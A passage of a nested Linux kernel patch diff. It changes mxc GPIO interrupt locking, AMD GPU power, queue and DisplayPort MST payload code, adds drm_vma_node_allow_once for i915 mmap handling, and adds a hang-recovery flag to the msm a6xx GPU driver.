++	raw_spin_lock_irqsave(&port->gc.bgpio_lock, flags);
++
+ 	if (GPIO_EDGE_SEL >= 0) {
+ 		val = readl(port->base + GPIO_EDGE_SEL);
+ 		if (edge == GPIO_INT_BOTH_EDGES)
+@@ -204,15 +208,20 @@ static int gpio_set_irq_type(struct irq_data *d, u32 type)
+ 
+ 	writel(1 << gpio_idx, port->base + GPIO_ISR);
+ 
+-	return 0;
++	raw_spin_unlock_irqrestore(&port->gc.bgpio_lock, flags);
++
++	return port->gc.direction_input(&port->gc, gpio_idx);
+ }
+ 
+ static void mxc_flip_edge(struct mxc_gpio_port *port, u32 gpio)
+ {
+ 	void __iomem *reg = port->base;
++	unsigned long flags;
+ 	u32 bit, val;
+ 	int edge;
+ 
++	raw_spin_lock_irqsave(&port->gc.bgpio_lock, flags);
++
+ 	reg += GPIO_ICR1 + ((gpio & 0x10) >> 2); /* lower or upper register */
+ 	bit = gpio & 0xf;
+ 	val = readl(reg);
+@@ -227,9 +236,12 @@ static void mxc_flip_edge(struct mxc_gpio_port *port, u32 gpio)
+ 	} else {
+ 		pr_err("mxc: invalid configuration for GPIO %d: %x\n",
+ 		       gpio, edge);
+-		return;
++		goto unlock;
+ 	}
+ 	writel(val | (edge << (bit << 1)), reg);
++
++unlock:
++	raw_spin_unlock_irqrestore(&port->gc.bgpio_lock, flags);
+ }
+ 
+ /* handle 32 interrupts in one status register */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 29f045079a3e1..404c839683b1c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -2130,7 +2130,7 @@ int amdgpu_amdkfd_map_gtt_bo_to_gart(struct amdgpu_device *adev, struct amdgpu_b
+ 	}
+ 
+ 	amdgpu_amdkfd_remove_eviction_fence(
+-		bo, bo->kfd_bo->process_info->eviction_fence);
++		bo, bo->vm_bo->vm->process_info->eviction_fence);
+ 
+ 	amdgpu_bo_unreserve(bo);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 99f5e38c4835e..3380daf42da8a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -586,10 +586,14 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_device *adev, bool enable)
+ 		if (adev->gfx.gfx_off_req_count == 0 &&
+ 		    !adev->gfx.gfx_off_state) {
+ 			/* If going to s2idle, no need to wait */
+-			if (adev->in_s0ix)
+-				delay = GFX_OFF_NO_DELAY;
+-			schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++			if (adev->in_s0ix) {
++				if (!amdgpu_dpm_set_powergating_by_smu(adev,
++						AMD_IP_BLOCK_TYPE_GFX, true))
++					adev->gfx.gfx_off_state = true;
++			} else {
++				schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ 					      delay);
++			}
+ 		}
+ 	} else {
+ 		if (adev->gfx.gfx_off_req_count == 0) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+index 725876b4f02ed..32b0ea8757fa5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -192,7 +192,6 @@ static int mes_v11_0_add_hw_queue(struct amdgpu_mes *mes,
+ 	mes_add_queue_pkt.trap_handler_addr = input->tba_addr;
+ 	mes_add_queue_pkt.tma_addr = input->tma_addr;
+ 	mes_add_queue_pkt.is_kfd_process = input->is_kfd_process;
+-	mes_add_queue_pkt.trap_en = 1;
+ 
+ 	/* For KFD, gds_size is re-used for queue size (needed in MES for AQL queues) */
+ 	mes_add_queue_pkt.is_aql_queue = input->is_aql_queue;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index ecb4c3abc6297..c06ada0844ba1 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -200,7 +200,7 @@ static int add_queue_mes(struct device_queue_manager *dqm, struct queue *q,
+ 	queue_input.wptr_addr = (uint64_t)q->properties.write_ptr;
+ 
+ 	if (q->wptr_bo) {
+-		wptr_addr_off = (uint64_t)q->properties.write_ptr - (uint64_t)q->wptr_bo->kfd_bo->va;
++		wptr_addr_off = (uint64_t)q->properties.write_ptr & (PAGE_SIZE - 1);
+ 		queue_input.wptr_mc_addr = ((uint64_t)q->wptr_bo->tbo.resource->start << PAGE_SHIFT) + wptr_addr_off;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 64fdf63093a00..63feea08904cb 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -570,6 +570,15 @@ svm_range_vram_node_new(struct amdgpu_device *adev, struct svm_range *prange,
+ 		goto reserve_bo_failed;
+ 	}
+ 
++	if (clear) {
++		r = amdgpu_bo_sync_wait(bo, AMDGPU_FENCE_OWNER_KFD, false);
++		if (r) {
++			pr_debug("failed %d to sync bo\n", r);
++			amdgpu_bo_unreserve(bo);
++			goto reserve_bo_failed;
++		}
++	}
++
+ 	r = dma_resv_reserve_fences(bo->tbo.base.resv, 1);
+ 	if (r) {
+ 		pr_debug("failed %d to reserve bo\n", r);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index e10f1f15c9c43..85bd1f18259c7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1737,10 +1737,6 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		adev->dm.vblank_control_workqueue = NULL;
+ 	}
+ 
+-	for (i = 0; i < adev->dm.display_indexes_num; i++) {
+-		drm_encoder_cleanup(&adev->dm.mst_encoders[i].base);
+-	}
+-
+ 	amdgpu_dm_destroy_drm_device(&adev->dm);
+ 
+ #if defined(CONFIG_DRM_AMD_SECURE_DISPLAY)
+@@ -9404,6 +9400,8 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 	bool lock_and_validation_needed = false;
+ 	struct dm_crtc_state *dm_old_crtc_state, *dm_new_crtc_state;
+ #if defined(CONFIG_DRM_AMD_DC_DCN)
++	struct drm_dp_mst_topology_mgr *mgr;
++	struct drm_dp_mst_topology_state *mst_state;
+ 	struct dsc_mst_fairness_vars vars[MAX_PIPES];
+ #endif
+ 
+@@ -9652,6 +9650,28 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		lock_and_validation_needed = true;
+ 	}
+ 
++#if defined(CONFIG_DRM_AMD_DC_DCN)
++	/* set the slot info for each mst_state based on the link encoding format */
++	for_each_new_mst_mgr_in_state(state, mgr, mst_state, i) {
++		struct amdgpu_dm_connector *aconnector;
++		struct drm_connector *connector;
++		struct drm_connector_list_iter iter;
++		u8 link_coding_cap;
++
++		drm_connector_list_iter_begin(dev, &iter);
++		drm_for_each_connector_iter(connector, &iter) {
++			if (connector->index == mst_state->mgr->conn_base_id) {
++				aconnector = to_amdgpu_dm_connector(connector);
++				link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(aconnector->dc_link);
++				drm_dp_mst_update_slots(mst_state, link_coding_cap);
++
++				break;
++			}
++		}
++		drm_connector_list_iter_end(&iter);
++	}
++#endif
++
+ 	/**
+ 	 * Streams and planes are reset when there are changes that affect
+ 	 * bandwidth. Anything that affects bandwidth needs to go through
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index f72c013d3a5b0..16623f73ddbe6 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -120,23 +120,50 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ }
+ 
+ static void
+-fill_dc_mst_payload_table_from_drm(struct drm_dp_mst_topology_state *mst_state,
+-				   struct amdgpu_dm_connector *aconnector,
++fill_dc_mst_payload_table_from_drm(struct dc_link *link,
++				   bool enable,
++				   struct drm_dp_mst_atomic_payload *target_payload,
+ 				   struct dc_dp_mst_stream_allocation_table *table)
+ {
+ 	struct dc_dp_mst_stream_allocation_table new_table = { 0 };
+ 	struct dc_dp_mst_stream_allocation *sa;
+-	struct drm_dp_mst_atomic_payload *payload;
++	struct link_mst_stream_allocation_table copy_of_link_table =
++										link->mst_stream_alloc_table;
++
++	int i;
++	int current_hw_table_stream_cnt = copy_of_link_table.stream_count;
++	struct link_mst_stream_allocation *dc_alloc;
++
++	/* TODO: refactor to set link->mst_stream_alloc_table directly if possible.*/
++	if (enable) {
++		dc_alloc =
++		&copy_of_link_table.stream_allocations[current_hw_table_stream_cnt];
++		dc_alloc->vcp_id = target_payload->vcpi;
++		dc_alloc->slot_count = target_payload->time_slots;
++	} else {
++		for (i = 0; i < copy_of_link_table.stream_count; i++) {
++			dc_alloc =
++			&copy_of_link_table.stream_allocations[i];
++
++			if (dc_alloc->vcp_id == target_payload->vcpi) {
++				dc_alloc->vcp_id = 0;
++				dc_alloc->slot_count = 0;
++				break;
++			}
++		}
++		ASSERT(i != copy_of_link_table.stream_count);
++	}
+ 
+ 	/* Fill payload info*/
+-	list_for_each_entry(payload, &mst_state->payloads, next) {
+-		if (payload->delete)
+-			continue;
+-
+-		sa = &new_table.stream_allocations[new_table.stream_count];
+-		sa->slot_count = payload->time_slots;
+-		sa->vcp_id = payload->vcpi;
+-		new_table.stream_count++;
++	for (i = 0; i < MAX_CONTROLLER_NUM; i++) {
++		dc_alloc =
++			&copy_of_link_table.stream_allocations[i];
++		if (dc_alloc->vcp_id > 0 && dc_alloc->slot_count > 0) {
++			sa = &new_table.stream_allocations[new_table.stream_count];
++			sa->slot_count = dc_alloc->slot_count;
++			sa->vcp_id = dc_alloc->vcp_id;
++			new_table.stream_count++;
++		}
+ 	}
+ 
+ 	/* Overwrite the old table */
+@@ -185,7 +212,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+ 	 * stream. AMD ASIC stream slot allocation should follow the same
+ 	 * sequence. copy DRM MST allocation to dc */
+-	fill_dc_mst_payload_table_from_drm(mst_state, aconnector, proposed_table);
++	fill_dc_mst_payload_table_from_drm(stream->link, enable, payload, proposed_table);
+ 
+ 	return true;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 6483ba266893d..8561e9b017a2e 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -468,7 +468,6 @@ static const struct drm_connector_helper_funcs dm_dp_mst_connector_helper_funcs
+ static void amdgpu_dm_encoder_destroy(struct drm_encoder *encoder)
+ {
+ 	drm_encoder_cleanup(encoder);
+-	kfree(encoder);
+ }
+ 
+ static const struct drm_encoder_funcs amdgpu_dm_encoder_funcs = {
+@@ -897,11 +896,6 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	if (IS_ERR(mst_state))
+ 		return PTR_ERR(mst_state);
+ 
+-	mst_state->pbn_div = dm_mst_get_pbn_divider(dc_link);
+-#if defined(CONFIG_DRM_AMD_DC_DCN)
+-	drm_dp_mst_update_slots(mst_state, dc_link_dp_mst_decide_link_encoding_format(dc_link));
+-#endif
+-
+ 	/* Set up params */
+ 	for (i = 0; i < dc_state->stream_count; i++) {
+ 		struct dc_dsc_policy dsc_policy = {0};
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index d7b1ace6328a0..40b9d2ce08e66 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -3995,10 +3995,13 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 	struct fixed31_32 avg_time_slots_per_mtp = dc_fixpt_from_int(0);
+ 	int i;
+ 	bool mst_mode = (link->type == dc_connection_mst_branch);
++	/* adjust for drm changes*/
++	bool update_drm_mst_state = true;
+ 	const struct link_hwss *link_hwss = get_link_hwss(link, &pipe_ctx->link_res);
+ 	const struct dc_link_settings empty_link_settings = {0};
+ 	DC_LOGGER_INIT(link->ctx->logger);
+ 
++
+ 	/* deallocate_mst_payload is called before disable link. When mode or
+ 	 * disable/enable monitor, new stream is created which is not in link
+ 	 * stream[] yet. For this, payload is not allocated yet, so de-alloc
+@@ -4014,7 +4017,7 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 				&empty_link_settings,
+ 				avg_time_slots_per_mtp);
+ 
+-	if (mst_mode) {
++	if (mst_mode || update_drm_mst_state) {
+ 		/* when link is in mst mode, reply on mst manager to remove
+ 		 * payload
+ 		 */
+@@ -4077,11 +4080,18 @@ static enum dc_status deallocate_mst_payload(struct pipe_ctx *pipe_ctx)
+ 			stream->ctx,
+ 			stream);
+ 
++		if (!update_drm_mst_state)
++			dm_helpers_dp_mst_send_payload_allocation(
++				stream->ctx,
++				stream,
++				false);
++	}
++
++	if (update_drm_mst_state)
+ 		dm_helpers_dp_mst_send_payload_allocation(
+ 			stream->ctx,
+ 			stream,
+ 			false);
+-	}
+ 
+ 	return DC_OK;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 4c20d17e7416e..cf96c3f2affe4 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -145,6 +145,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(SetBadMemoryPagesRetiredFlagsPerChannel,
+ 			    PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,   0),
+ 	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
++	MSG_MAP(AllowIHHostInterrupt,		PPSMC_MSG_AllowIHHostInterrupt,       0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_clk_map[SMU_CLK_COUNT] = {
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 51a46689cda70..4ca37261584a9 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3372,6 +3372,9 @@ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	mgr->payload_count--;
+ 	mgr->next_start_slot -= payload->time_slots;
++
++	if (payload->delete)
++		drm_dp_mst_put_port_malloc(payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
+@@ -4327,7 +4330,6 @@ int drm_dp_atomic_release_time_slots(struct drm_atomic_state *state,
+ 
+ 	drm_dbg_atomic(mgr->dev, "[MST PORT:%p] TU %d -> 0\n", port, payload->time_slots);
+ 	if (!payload->delete) {
+-		drm_dp_mst_put_port_malloc(port);
+ 		payload->pbn = 0;
+ 		payload->delete = true;
+ 		topology_state->payload_mask &= ~BIT(payload->vcpi - 1);
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 52d8800a8ab86..3659f0465a724 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -304,6 +304,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGM"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Ideapad D330-10IGL (HD) */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
++		},
++		.driver_data = (void *)&lcd800x1280_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+diff --git a/drivers/gpu/drm/drm_vma_manager.c b/drivers/gpu/drm/drm_vma_manager.c
+index 7de37f8c68fd0..83229a031af0f 100644
+--- a/drivers/gpu/drm/drm_vma_manager.c
++++ b/drivers/gpu/drm/drm_vma_manager.c
+@@ -240,27 +240,8 @@ void drm_vma_offset_remove(struct drm_vma_offset_manager *mgr,
+ }
+ EXPORT_SYMBOL(drm_vma_offset_remove);
+ 
+-/**
+- * drm_vma_node_allow - Add open-file to list of allowed users
+- * @node: Node to modify
+- * @tag: Tag of file to remove
+- *
+- * Add @tag to the list of allowed open-files for this node. If @tag is
+- * already on this list, the ref-count is incremented.
+- *
+- * The list of allowed-users is preserved across drm_vma_offset_add() and
+- * drm_vma_offset_remove() calls. You may even call it if the node is currently
+- * not added to any offset-manager.
+- *
+- * You must remove all open-files the same number of times as you added them
+- * before destroying the node. Otherwise, you will leak memory.
+- *
+- * This is locked against concurrent access internally.
+- *
+- * RETURNS:
+- * 0 on success, negative error code on internal failure (out-of-mem)
+- */
+-int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
++static int vma_node_allow(struct drm_vma_offset_node *node,
++			  struct drm_file *tag, bool ref_counted)
+ {
+ 	struct rb_node **iter;
+ 	struct rb_node *parent = NULL;
+@@ -282,7 +263,8 @@ int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
+ 		entry = rb_entry(*iter, struct drm_vma_offset_file, vm_rb);
+ 
+ 		if (tag == entry->vm_tag) {
+-			entry->vm_count++;
++			if (ref_counted)
++				entry->vm_count++;
+ 			goto unlock;
+ 		} else if (tag > entry->vm_tag) {
+ 			iter = &(*iter)->rb_right;
+@@ -307,8 +289,58 @@ unlock:
+ 	kfree(new);
+ 	return ret;
+ }
++
++/**
++ * drm_vma_node_allow - Add open-file to list of allowed users
++ * @node: Node to modify
++ * @tag: Tag of file to remove
++ *
++ * Add @tag to the list of allowed open-files for this node. If @tag is
++ * already on this list, the ref-count is incremented.
++ *
++ * The list of allowed-users is preserved across drm_vma_offset_add() and
++ * drm_vma_offset_remove() calls. You may even call it if the node is currently
++ * not added to any offset-manager.
++ *
++ * You must remove all open-files the same number of times as you added them
++ * before destroying the node. Otherwise, you will leak memory.
++ *
++ * This is locked against concurrent access internally.
++ *
++ * RETURNS:
++ * 0 on success, negative error code on internal failure (out-of-mem)
++ */
++int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag)
++{
++	return vma_node_allow(node, tag, true);
++}
+ EXPORT_SYMBOL(drm_vma_node_allow);
+ 
++/**
++ * drm_vma_node_allow_once - Add open-file to list of allowed users
++ * @node: Node to modify
++ * @tag: Tag of file to remove
++ *
++ * Add @tag to the list of allowed open-files for this node.
++ *
++ * The list of allowed-users is preserved across drm_vma_offset_add() and
++ * drm_vma_offset_remove() calls. You may even call it if the node is currently
++ * not added to any offset-manager.
++ *
++ * This is not ref-counted unlike drm_vma_node_allow() hence drm_vma_node_revoke()
++ * should only be called once after this.
++ *
++ * This is locked against concurrent access internally.
++ *
++ * RETURNS:
++ * 0 on success, negative error code on internal failure (out-of-mem)
++ */
++int drm_vma_node_allow_once(struct drm_vma_offset_node *node, struct drm_file *tag)
++{
++	return vma_node_allow(node, tag, false);
++}
++EXPORT_SYMBOL(drm_vma_node_allow_once);
++
+ /**
+  * drm_vma_node_revoke - Remove open-file from list of allowed users
+  * @node: Node to modify
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 78b3427471bd7..b94bcceeff705 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5216,9 +5216,7 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+ 			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+-	intel_panel_add_edid_fixed_modes(intel_connector,
+-					 intel_connector->panel.vbt.drrs_type != DRRS_TYPE_NONE ||
+-					 intel_vrr_is_capable(intel_connector));
++	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+ 	/* MSO requires information from the EDID */
+ 	intel_edp_mso_init(intel_dp);
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index 41cec9dc42231..f72f4646c0d70 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -85,9 +85,10 @@ static bool is_alt_drrs_mode(const struct drm_display_mode *mode,
+ static bool is_alt_fixed_mode(const struct drm_display_mode *mode,
+ 			      const struct drm_display_mode *preferred_mode)
+ {
+-	return drm_mode_match(mode, preferred_mode,
+-			      DRM_MODE_MATCH_FLAGS |
+-			      DRM_MODE_MATCH_3D_FLAGS) &&
++	u32 sync_flags = DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NHSYNC |
++		DRM_MODE_FLAG_PVSYNC | DRM_MODE_FLAG_NVSYNC;
++
++	return (mode->flags & ~sync_flags) == (preferred_mode->flags & ~sync_flags) &&
+ 		mode->hdisplay == preferred_mode->hdisplay &&
+ 		mode->vdisplay == preferred_mode->vdisplay;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index 354c1d6dab846..d445e2d63c9c8 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -697,7 +697,7 @@ insert:
+ 	GEM_BUG_ON(lookup_mmo(obj, mmap_type) != mmo);
+ out:
+ 	if (file)
+-		drm_vma_node_allow(&mmo->vma_node, file);
++		drm_vma_node_allow_once(&mmo->vma_node, file);
+ 	return mmo;
+ 
+ err:
+diff --git a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+index c570cf780079a..436598f19522c 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
++++ b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+@@ -1697,7 +1697,7 @@ static int igt_shrink_thp(void *arg)
+ 			I915_SHRINK_ACTIVE);
+ 	i915_vma_unpin(vma);
+ 	if (err)
+-		goto out_put;
++		goto out_wf;
+ 
+ 	/*
+ 	 * Now that the pages are *unpinned* shrinking should invoke
+@@ -1713,19 +1713,19 @@ static int igt_shrink_thp(void *arg)
+ 		pr_err("unexpected pages mismatch, should_swap=%s\n",
+ 		       str_yes_no(should_swap));
+ 		err = -EINVAL;
+-		goto out_put;
++		goto out_wf;
+ 	}
+ 
+ 	if (should_swap == (obj->mm.page_sizes.sg || obj->mm.page_sizes.phys)) {
+ 		pr_err("unexpected residual page-size bits, should_swap=%s\n",
+ 		       str_yes_no(should_swap));
+ 		err = -EINVAL;
+-		goto out_put;
++		goto out_wf;
+ 	}
+ 
+ 	err = i915_vma_pin(vma, 0, 0, flags);
+ 	if (err)
+-		goto out_put;
++		goto out_wf;
+ 
+ 	while (n--) {
+ 		err = cpu_check(obj, n, 0xdeadbeaf);
+diff --git a/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c b/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
+index 310fb83c527eb..2990dd4d4a0d8 100644
+--- a/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
++++ b/drivers/gpu/drm/i915/selftests/intel_scheduler_helpers.c
+@@ -28,8 +28,7 @@ struct intel_engine_cs *intel_selftest_find_any_engine(struct intel_gt *gt)
+ 
+ int intel_selftest_modify_policy(struct intel_engine_cs *engine,
+ 				 struct intel_selftest_saved_policy *saved,
+-				 u32 modify_type)
+-
++				 enum selftest_scheduler_modify modify_type)
+ {
+ 	int err;
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gmu.c b/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
+index e033d6a67a20c..870252bef23f3 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gmu.c
+@@ -876,7 +876,8 @@ static void a6xx_gmu_rpmh_off(struct a6xx_gmu *gmu)
+ #define GBIF_CLIENT_HALT_MASK             BIT(0)
+ #define GBIF_ARB_HALT_MASK                BIT(1)
+ 
+-static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu)
++static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu,
++		bool gx_off)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+ 
+@@ -889,9 +890,11 @@ static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu)
+ 		return;
+ 	}
+ 
+-	/* Halt the gx side of GBIF */
+-	gpu_write(gpu, REG_A6XX_RBBM_GBIF_HALT, 1);
+-	spin_until(gpu_read(gpu, REG_A6XX_RBBM_GBIF_HALT_ACK) & 1);
++	if (gx_off) {
++		/* Halt the gx side of GBIF */
++		gpu_write(gpu, REG_A6XX_RBBM_GBIF_HALT, 1);
++		spin_until(gpu_read(gpu, REG_A6XX_RBBM_GBIF_HALT_ACK) & 1);
++	}
+ 
+ 	/* Halt new client requests on GBIF */
+ 	gpu_write(gpu, REG_A6XX_GBIF_HALT, GBIF_CLIENT_HALT_MASK);
+@@ -929,7 +932,7 @@ static void a6xx_gmu_force_off(struct a6xx_gmu *gmu)
+ 	/* Halt the gmu cm3 core */
+ 	gmu_write(gmu, REG_A6XX_GMU_CM3_SYSRESET, 1);
+ 
+-	a6xx_bus_clear_pending_transactions(adreno_gpu);
++	a6xx_bus_clear_pending_transactions(adreno_gpu, true);
+ 
+ 	/* Reset GPU core blocks */
+ 	gpu_write(gpu, REG_A6XX_RBBM_SW_RESET_CMD, 1);
+@@ -1083,7 +1086,7 @@ static void a6xx_gmu_shutdown(struct a6xx_gmu *gmu)
+ 			return;
+ 		}
+ 
+-		a6xx_bus_clear_pending_transactions(adreno_gpu);
++		a6xx_bus_clear_pending_transactions(adreno_gpu, a6xx_gpu->hung);
+ 
+ 		/* tell the GMU we want to slumber */
+ 		ret = a6xx_gmu_notify_slumber(gmu);
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index e846e629c00d8..9d7fc44c1e2a9 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -1277,6 +1277,12 @@ static void a6xx_recover(struct msm_gpu *gpu)
+ 	if (hang_debug)
+ 		a6xx_dump(gpu);
+ 
++	/*
++	 * To handle recovery specific sequences during the rpm suspend we are
++	 * about to trigger
++	 */
++	a6xx_gpu->hung = true;
++
+ 	/* Halt SQE first */
+ 	gpu_write(gpu, REG_A6XX_CP_SQE_CNTL, 3);
+ 
+@@ -1319,6 +1325,7 @@ static void a6xx_recover(struct msm_gpu *gpu)
+ 	mutex_unlock(&gpu->active_lock);
+ 
+ 	msm_gpu_hw_init(gpu);
++	a6xx_gpu->hung = false;
+ }
+ 
+ static const char *a6xx_uche_fault_block(struct msm_gpu *gpu, u32 mid)
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.h b/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
+index ab853f61db632..eea2e60ce3b7b 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
+@@ -32,6 +32,7 @@ struct a6xx_gpu {
+ 	void *llc_slice;
+ 	void *htw_llc_slice;
+ 	bool have_mmu500;
++	bool hung;
+ };
+ 
+ #define to_a6xx_gpu(x) container_of(x, struct a6xx_gpu, base)
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 5a0e8491cd3a0..2e7531d2a5d6e 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -351,6 +351,8 @@ int adreno_set_param(struct msm_gpu *gpu, struct msm_file_private *ctx,
+ 		/* Ensure string is null terminated: */
